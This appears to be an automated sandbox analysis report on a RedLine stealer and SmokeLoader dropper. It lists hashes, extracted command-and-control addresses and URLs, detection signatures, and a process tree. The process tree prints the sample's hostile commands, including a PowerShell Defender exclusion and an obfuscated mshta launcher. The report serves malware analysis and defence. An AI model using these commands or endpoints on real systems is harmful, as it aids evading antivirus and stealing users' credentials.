redline | 400debff42246bcf28d1eba937480ebdfa755c932707db10ab58ec4a1f5e94f1

Resubmissions

10-11-2021 14:52

211110-r84p8aedej 10

09-11-2021 13:19

211109-qkrv3sfcg4 10

Analysis

max time kernel
81s
max time network
199s
platform
windows10_x64
resource
win10-en-20211104
submitted
09-11-2021 13:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

01a53007f9b19d8ae4f12cc75bafcbef064f75d3a4b31b347b334a2d30558d68.exe
Size

3.3MB
MD5

b5b1415b3890d0108ac53acd595497b9
SHA1

876eb8e34ecb3c1fea20e2c6b710346676ad2de2
SHA256

01a53007f9b19d8ae4f12cc75bafcbef064f75d3a4b31b347b334a2d30558d68
SHA512

fe58023cba73deac0229cd45b73227e5d1c1f6760f3f053dbcdb4f388d6234940985f57ab8ffc73c4e8eff4bf3a2ef956cd44bdcdd66c44c1cc1ea86e335e4d0

Score

10^/10

redline smokeloader ani media12 she aspackv2 backdoor infostealer spyware stealer themida trojan

Malware Config

Extracted

Family

redline

Botnet

she

135.181.129.119:4805

Extracted

Family

redline

Botnet

media12

91.121.67.60:2151

Extracted

Family

redline

Botnet

ANI

45.142.215.47:27643

Extracted

Family

smokeloader

Version

2020

http://gmpeople.com/upload/

http://mile48.com/upload/

http://lecanardstsornin.com/upload/

http://m3600.com/upload/

http://camasirx.com/upload/

rc4.i32

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1840	2848	rundll32.exe	105

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 8 IoCs

resource	yara_rule
behavioral2/memory/3520-221-0x0000000003440000-0x000000000345F000-memory.dmp	family_redline
behavioral2/memory/3520-228-0x00000000036C0000-0x00000000036DD000-memory.dmp	family_redline
behavioral2/memory/3068-244-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral2/memory/3068-245-0x000000000041B236-mapping.dmp	family_redline
behavioral2/memory/2096-248-0x000000000041B23A-mapping.dmp	family_redline
behavioral2/memory/2096-246-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral2/files/0x000400000001ac31-338.dat	family_redline
behavioral2/files/0x000400000001ac31-337.dat	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral2/files/0x000600000001abb2-123.dat	aspack_v212_v242
behavioral2/files/0x000600000001abb2-124.dat	aspack_v212_v242
behavioral2/files/0x000600000001abb4-122.dat	aspack_v212_v242
behavioral2/files/0x000400000001abfd-130.dat	aspack_v212_v242
behavioral2/files/0x000400000001abfd-128.dat	aspack_v212_v242
behavioral2/files/0x000600000001abb4-127.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 12 IoCs

pid	Process
504	setup_install.exe
788	Mon23c24f1baea.exe
4036	Mon238458ef4a8bf072.exe
2892	Mon23c5eb411df3ff0.exe
1772	Mon2318d827d83a07bf.exe
1708	Mon2391a8f2e1f6314.exe
3004	Mon23088eab157af.exe
3752	Mon2333eed5b683cf.exe
3520	Mon23d53cfe0f9a3e0d5.exe
1908	Mon23b195c40d1.exe
3540	Mon233667d8bdfd05a68.exe
2848	Mon2364153e7a62.exe

Loads dropped DLL 6 IoCs

pid	Process
504	setup_install.exe
504	setup_install.exe
504	setup_install.exe
504	setup_install.exe
504	setup_install.exe
504	setup_install.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 1 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000200000001a20e-363.dat	themida

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
49	api.db-ip.com
50	api.db-ip.com
11	ip-api.com
45	ipinfo.io
46	ipinfo.io

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
3804	504	WerFault.exe	69
4964	3540	WerFault.exe	91

Kills process with taskkill 1 IoCs

evasion

pid	Process
4444	taskkill.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	19	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	3752	Mon2333eed5b683cf.exe
Token: SeDebugPrivilege	4036	Mon238458ef4a8bf072.exe
Token: SeRestorePrivilege	3804	WerFault.exe
Token: SeBackupPrivilege	3804	WerFault.exe
Token: SeDebugPrivilege	2992	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1892 wrote to memory of 504	1892	01a53007f9b19d8ae4f12cc75bafcbef064f75d3a4b31b347b334a2d30558d68.exe	69
PID 1892 wrote to memory of 504	1892	01a53007f9b19d8ae4f12cc75bafcbef064f75d3a4b31b347b334a2d30558d68.exe	69
PID 1892 wrote to memory of 504	1892	01a53007f9b19d8ae4f12cc75bafcbef064f75d3a4b31b347b334a2d30558d68.exe	69
PID 504 wrote to memory of 1084	504	setup_install.exe	73
PID 504 wrote to memory of 1084	504	setup_install.exe	73
PID 504 wrote to memory of 1084	504	setup_install.exe	73
PID 504 wrote to memory of 352	504	setup_install.exe	74
PID 504 wrote to memory of 352	504	setup_install.exe	74
PID 504 wrote to memory of 352	504	setup_install.exe	74
PID 504 wrote to memory of 1756	504	setup_install.exe	75
PID 504 wrote to memory of 1756	504	setup_install.exe	75
PID 504 wrote to memory of 1756	504	setup_install.exe	75
PID 504 wrote to memory of 1732	504	setup_install.exe	76
PID 504 wrote to memory of 1732	504	setup_install.exe	76
PID 504 wrote to memory of 1732	504	setup_install.exe	76
PID 504 wrote to memory of 3376	504	setup_install.exe	90
PID 504 wrote to memory of 3376	504	setup_install.exe	90
PID 504 wrote to memory of 3376	504	setup_install.exe	90
PID 352 wrote to memory of 788	352	cmd.exe	77
PID 352 wrote to memory of 788	352	cmd.exe	77
PID 352 wrote to memory of 788	352	cmd.exe	77
PID 1084 wrote to memory of 2992	1084	cmd.exe	89
PID 1084 wrote to memory of 2992	1084	cmd.exe	89
PID 1084 wrote to memory of 2992	1084	cmd.exe	89
PID 504 wrote to memory of 1064	504	setup_install.exe	78
PID 504 wrote to memory of 1064	504	setup_install.exe	78
PID 504 wrote to memory of 1064	504	setup_install.exe	78
PID 504 wrote to memory of 904	504	setup_install.exe	88
PID 504 wrote to memory of 904	504	setup_install.exe	88
PID 504 wrote to memory of 904	504	setup_install.exe	88
PID 1064 wrote to memory of 4036	1064	cmd.exe	87
PID 1064 wrote to memory of 4036	1064	cmd.exe	87
PID 1756 wrote to memory of 1772	1756	cmd.exe	81
PID 1756 wrote to memory of 1772	1756	cmd.exe	81
PID 1756 wrote to memory of 1772	1756	cmd.exe	81
PID 904 wrote to memory of 2892	904	cmd.exe	80
PID 904 wrote to memory of 2892	904	cmd.exe	80
PID 904 wrote to memory of 2892	904	cmd.exe	80
PID 504 wrote to memory of 2224	504	setup_install.exe	79
PID 504 wrote to memory of 2224	504	setup_install.exe	79
PID 504 wrote to memory of 2224	504	setup_install.exe	79
PID 504 wrote to memory of 2976	504	setup_install.exe	82
PID 504 wrote to memory of 2976	504	setup_install.exe	82
PID 504 wrote to memory of 2976	504	setup_install.exe	82
PID 1732 wrote to memory of 1708	1732	cmd.exe	86
PID 1732 wrote to memory of 1708	1732	cmd.exe	86
PID 1732 wrote to memory of 1708	1732	cmd.exe	86
PID 504 wrote to memory of 1900	504	setup_install.exe	85
PID 504 wrote to memory of 1900	504	setup_install.exe	85
PID 504 wrote to memory of 1900	504	setup_install.exe	85
PID 504 wrote to memory of 2088	504	setup_install.exe	84
PID 504 wrote to memory of 2088	504	setup_install.exe	84
PID 504 wrote to memory of 2088	504	setup_install.exe	84
PID 504 wrote to memory of 8	504	setup_install.exe	83
PID 504 wrote to memory of 8	504	setup_install.exe	83
PID 504 wrote to memory of 8	504	setup_install.exe	83
PID 1900 wrote to memory of 3004	1900	cmd.exe	98
PID 1900 wrote to memory of 3004	1900	cmd.exe	98
PID 1900 wrote to memory of 3004	1900	cmd.exe	98
PID 2976 wrote to memory of 3752	2976	cmd.exe	97
PID 2976 wrote to memory of 3752	2976	cmd.exe	97
PID 3376 wrote to memory of 3540	3376	cmd.exe	91
PID 3376 wrote to memory of 3540	3376	cmd.exe	91
PID 3376 wrote to memory of 3540	3376	cmd.exe	91

C:\Users\Admin\AppData\Local\Temp\01a53007f9b19d8ae4f12cc75bafcbef064f75d3a4b31b347b334a2d30558d68.exe
"C:\Users\Admin\AppData\Local\Temp\01a53007f9b19d8ae4f12cc75bafcbef064f75d3a4b31b347b334a2d30558d68.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1892
- C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1084
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2992
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon23c24f1baea.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:352
  - - C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\Mon23c24f1baea.exe
      Mon23c24f1baea.exe
      4⤵
      Executes dropped EXE
      PID:788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon2318d827d83a07bf.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1756
  - - C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\Mon2318d827d83a07bf.exe
      Mon2318d827d83a07bf.exe
      4⤵
      Executes dropped EXE
      PID:1772
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\Mon2318d827d83a07bf.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\Mon2318d827d83a07bf.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
        5⤵
        
        PID:360
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\Mon2318d827d83a07bf.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\Mon2318d827d83a07bf.exe") do taskkill /F -Im "%~NxU"
        6⤵
        
        PID:1112
        
        C:\Users\Admin\AppData\Local\Temp\09xU.exE
        
        09xU.EXE -pPtzyIkqLZoCarb5ew
        7⤵
        
        PID:4116
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
        8⤵
        
        PID:4312
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
        9⤵
        
        PID:4664
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F -Im "Mon2318d827d83a07bf.exe"
        7⤵
        Kills process with taskkill
        
        PID:4444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon2391a8f2e1f6314.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1732
  - - C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\Mon2391a8f2e1f6314.exe
      Mon2391a8f2e1f6314.exe
      4⤵
      Executes dropped EXE
      PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon238458ef4a8bf072.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1064
  - - C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\Mon238458ef4a8bf072.exe
      Mon238458ef4a8bf072.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4036
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon23b195c40d1.exe
    3⤵
    PID:2224
  - - C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\Mon23b195c40d1.exe
      Mon23b195c40d1.exe
      4⤵
      Executes dropped EXE
      PID:1908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon2333eed5b683cf.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2976
  - - C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\Mon2333eed5b683cf.exe
      Mon2333eed5b683cf.exe
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:3752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon23d53cfe0f9a3e0d5.exe
    3⤵
    PID:8
  - - C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\Mon23d53cfe0f9a3e0d5.exe
      Mon23d53cfe0f9a3e0d5.exe
      4⤵
      Executes dropped EXE
      PID:3520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon2364153e7a62.exe
    3⤵
    PID:2088
  - - C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\Mon2364153e7a62.exe
      Mon2364153e7a62.exe
      4⤵
      Executes dropped EXE
      PID:2848
    - - C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\Mon2364153e7a62.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\Mon2364153e7a62.exe
        5⤵
        
        PID:3068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon23088eab157af.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1900
  - - C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\Mon23088eab157af.exe
      Mon23088eab157af.exe
      4⤵
      Executes dropped EXE
      PID:3004
    - - C:\Users\Admin\Pictures\Adobe Films\GKHadWRueXBW5kSscwWdrrxn.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\GKHadWRueXBW5kSscwWdrrxn.exe"
        5⤵
        
        PID:2432
    - - C:\Users\Admin\Pictures\Adobe Films\auEDBFOl4HyQPrOur70cXhde.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\auEDBFOl4HyQPrOur70cXhde.exe"
        5⤵
        
        PID:1048
    - - C:\Users\Admin\Pictures\Adobe Films\HNeQNegelUnbqftDZTlGI6DZ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\HNeQNegelUnbqftDZTlGI6DZ.exe"
        5⤵
        
        PID:852
    - - C:\Users\Admin\Pictures\Adobe Films\ZChSLLTcctl6gwru8_GQ9WP1.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\ZChSLLTcctl6gwru8_GQ9WP1.exe"
        5⤵
        
        PID:4332
    - - C:\Users\Admin\Pictures\Adobe Films\Vmwc8_htGdIkfHMCYlCozsfd.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Vmwc8_htGdIkfHMCYlCozsfd.exe"
        5⤵
        
        PID:4304
    - - C:\Users\Admin\Pictures\Adobe Films\avOh9vBwOfVyrU_nesC3slxo.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\avOh9vBwOfVyrU_nesC3slxo.exe"
        5⤵
        
        PID:4212
    - - C:\Users\Admin\Pictures\Adobe Films\wh1AFCfmQYqywJwJcxEkqfRo.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\wh1AFCfmQYqywJwJcxEkqfRo.exe"
        5⤵
        
        PID:4240
    - - C:\Users\Admin\Pictures\Adobe Films\UaFTbPsYA7cx2a_Qpn8j8EDg.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\UaFTbPsYA7cx2a_Qpn8j8EDg.exe"
        5⤵
        
        PID:4784
    - - C:\Users\Admin\Pictures\Adobe Films\CgTPUiwm0SeHeRcToQGhO7Zx.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\CgTPUiwm0SeHeRcToQGhO7Zx.exe"
        5⤵
        
        PID:4740
    - - C:\Users\Admin\Pictures\Adobe Films\rVh2YNJ3WtMfzxCxNWoMlALK.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\rVh2YNJ3WtMfzxCxNWoMlALK.exe"
        5⤵
        
        PID:4716
    - - C:\Users\Admin\Pictures\Adobe Films\hPqvM7FehKkh2UlXjc1tFTe1.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\hPqvM7FehKkh2UlXjc1tFTe1.exe"
        5⤵
        
        PID:4652
    - - C:\Users\Admin\Pictures\Adobe Films\8o_NYg69Fue0AP2GdWhW8WLQ.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\8o_NYg69Fue0AP2GdWhW8WLQ.exe"
        5⤵
        
        PID:4600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon23c5eb411df3ff0.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Mon233667d8bdfd05a68.exe /mixone
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3376
  - - C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\Mon233667d8bdfd05a68.exe
      Mon233667d8bdfd05a68.exe /mixone
      4⤵
      Executes dropped EXE
      PID:3540
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3540 -s 656
        5⤵
        Program crash
        
        PID:4964
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 504 -s 568
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:3804

C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\Mon23c5eb411df3ff0.exe
Mon23c5eb411df3ff0.exe
1⤵
- Executes dropped EXE
PID:2892
- C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\Mon23c5eb411df3ff0.exe
  C:\Users\Admin\AppData\Local\Temp\7zS467D8DF6\Mon23c5eb411df3ff0.exe
  2⤵
  PID:2096

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:1840
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:4104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:4284

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/504-135-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/504-132-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/504-140-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/504-142-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/504-141-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/504-134-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/504-133-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/504-136-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/504-137-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/504-138-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/504-139-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/504-143-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/788-240-0x0000000000030000-0x0000000000039000-memory.dmp

Filesize
36KB

Download
memory/788-242-0x0000000000400000-0x0000000000443000-memory.dmp

Filesize
268KB

Download
memory/788-157-0x0000000000651000-0x000000000065A000-memory.dmp

Filesize
36KB

Download
memory/808-326-0x0000023268350000-0x00000232683C2000-memory.dmp

Filesize
456KB

Download
memory/1012-308-0x000001C310A60000-0x000001C310AD2000-memory.dmp

Filesize
456KB

Download
memory/1100-324-0x000002AB81760000-0x000002AB817D2000-memory.dmp

Filesize
456KB

Download
memory/1152-332-0x0000028C09D10000-0x0000028C09D82000-memory.dmp

Filesize
456KB

Download
memory/1344-333-0x0000013971060000-0x00000139710D2000-memory.dmp

Filesize
456KB

Download
memory/1352-329-0x0000025D431A0000-0x0000025D43212000-memory.dmp

Filesize
456KB

Download
memory/1772-182-0x0000000000AF0000-0x0000000000AF1000-memory.dmp

Filesize
4KB

Download
memory/1772-178-0x0000000000AF0000-0x0000000000AF1000-memory.dmp

Filesize
4KB

Download
memory/1864-330-0x000001E9CF8C0000-0x000001E9CF932000-memory.dmp

Filesize
456KB

Download
memory/2096-246-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/2096-267-0x0000000004EB0000-0x00000000054B6000-memory.dmp

Filesize
6.0MB

Download
memory/2264-295-0x0000000001260000-0x0000000001275000-memory.dmp

Filesize
84KB

Download
memory/2292-299-0x0000024058170000-0x00000240581E2000-memory.dmp

Filesize
456KB

Download
memory/2316-306-0x0000022C63350000-0x0000022C633C2000-memory.dmp

Filesize
456KB

Download
memory/2480-305-0x0000016E47D80000-0x0000016E47DF2000-memory.dmp

Filesize
456KB

Download
memory/2548-325-0x0000016957F30000-0x0000016957FA2000-memory.dmp

Filesize
456KB

Download
memory/2556-331-0x0000025F7A640000-0x0000025F7A6B2000-memory.dmp

Filesize
456KB

Download
memory/2848-215-0x0000000005500000-0x0000000005501000-memory.dmp

Filesize
4KB

Download
memory/2848-223-0x0000000005A10000-0x0000000005A11000-memory.dmp

Filesize
4KB

Download
memory/2848-206-0x0000000000B30000-0x0000000000B31000-memory.dmp

Filesize
4KB

Download
memory/2892-197-0x0000000005320000-0x0000000005321000-memory.dmp

Filesize
4KB

Download
memory/2892-210-0x00000000052E0000-0x00000000052E1000-memory.dmp

Filesize
4KB

Download
memory/2892-173-0x0000000000B00000-0x0000000000B01000-memory.dmp

Filesize
4KB

Download
memory/2892-212-0x00000000052A0000-0x0000000005316000-memory.dmp

Filesize
472KB

Download
memory/2992-167-0x0000000000D00000-0x0000000000D01000-memory.dmp

Filesize
4KB

Download
memory/2992-239-0x0000000006FD0000-0x0000000006FD1000-memory.dmp

Filesize
4KB

Download
memory/2992-193-0x0000000000E50000-0x0000000000E51000-memory.dmp

Filesize
4KB

Download
memory/2992-222-0x0000000006980000-0x0000000006981000-memory.dmp

Filesize
4KB

Download
memory/2992-204-0x00000000070E0000-0x00000000070E1000-memory.dmp

Filesize
4KB

Download
memory/2992-176-0x0000000000D00000-0x0000000000D01000-memory.dmp

Filesize
4KB

Download
memory/2992-229-0x0000000007710000-0x0000000007711000-memory.dmp

Filesize
4KB

Download
memory/2992-227-0x0000000006EE0000-0x0000000006EE1000-memory.dmp

Filesize
4KB

Download
memory/2992-213-0x0000000006AA2000-0x0000000006AA3000-memory.dmp

Filesize
4KB

Download
memory/2992-225-0x0000000006D70000-0x0000000006D71000-memory.dmp

Filesize
4KB

Download
memory/2992-209-0x0000000006AA0000-0x0000000006AA1000-memory.dmp

Filesize
4KB

Download
memory/3004-255-0x0000000005570000-0x00000000056BC000-memory.dmp

Filesize
1.3MB

Download
memory/3068-266-0x0000000005230000-0x0000000005836000-memory.dmp

Filesize
6.0MB

Download
memory/3068-244-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/3348-302-0x000001CE26D80000-0x000001CE26DCD000-memory.dmp

Filesize
308KB

Download
memory/3348-304-0x000001CE26E40000-0x000001CE26EB2000-memory.dmp

Filesize
456KB

Download
memory/3520-234-0x0000000005CD4000-0x0000000005CD6000-memory.dmp

Filesize
8KB

Download
memory/3520-228-0x00000000036C0000-0x00000000036DD000-memory.dmp

Filesize
116KB

Download
memory/3520-237-0x0000000005CD3000-0x0000000005CD4000-memory.dmp

Filesize
4KB

Download
memory/3520-235-0x0000000006910000-0x0000000006911000-memory.dmp

Filesize
4KB

Download
memory/3520-233-0x0000000006800000-0x0000000006801000-memory.dmp

Filesize
4KB

Download
memory/3520-207-0x0000000001938000-0x000000000195B000-memory.dmp

Filesize
140KB

Download
memory/3520-220-0x0000000000400000-0x00000000016E0000-memory.dmp

Filesize
18.9MB

Download
memory/3520-232-0x0000000005CD0000-0x0000000005CD1000-memory.dmp

Filesize
4KB

Download
memory/3520-236-0x0000000005CD2000-0x0000000005CD3000-memory.dmp

Filesize
4KB

Download
memory/3520-231-0x0000000005CB0000-0x0000000005CB1000-memory.dmp

Filesize
4KB

Download
memory/3520-238-0x0000000006990000-0x0000000006991000-memory.dmp

Filesize
4KB

Download
memory/3520-221-0x0000000003440000-0x000000000345F000-memory.dmp

Filesize
124KB

Download
memory/3520-219-0x00000000031C0000-0x00000000031F0000-memory.dmp

Filesize
192KB

Download
memory/3520-230-0x00000000061E0000-0x00000000061E1000-memory.dmp

Filesize
4KB

Download
memory/3540-276-0x0000000000470000-0x00000000005BA000-memory.dmp

Filesize
1.3MB

Download
memory/3540-278-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/3540-200-0x0000000000651000-0x000000000067A000-memory.dmp

Filesize
164KB

Download
memory/3752-216-0x000000001BA70000-0x000000001BA72000-memory.dmp

Filesize
8KB

Download
memory/3752-195-0x0000000000F00000-0x0000000000F01000-memory.dmp

Filesize
4KB

Download
memory/4036-217-0x0000000001730000-0x0000000001732000-memory.dmp

Filesize
8KB

Download
memory/4036-170-0x0000000000F20000-0x0000000000F21000-memory.dmp

Filesize
4KB

Download
memory/4036-202-0x0000000001520000-0x0000000001521000-memory.dmp

Filesize
4KB

Download
memory/4104-297-0x0000000004639000-0x000000000473A000-memory.dmp

Filesize
1.0MB

Download
memory/4104-300-0x0000000000BB0000-0x0000000000C0D000-memory.dmp

Filesize
372KB

Download
memory/4116-277-0x00000000029C0000-0x00000000029C1000-memory.dmp

Filesize
4KB

Download
memory/4284-307-0x00000190F0200000-0x00000190F0272000-memory.dmp

Filesize
456KB

Download
memory/4600-362-0x0000000000C40000-0x0000000000C43000-memory.dmp

Filesize
12KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads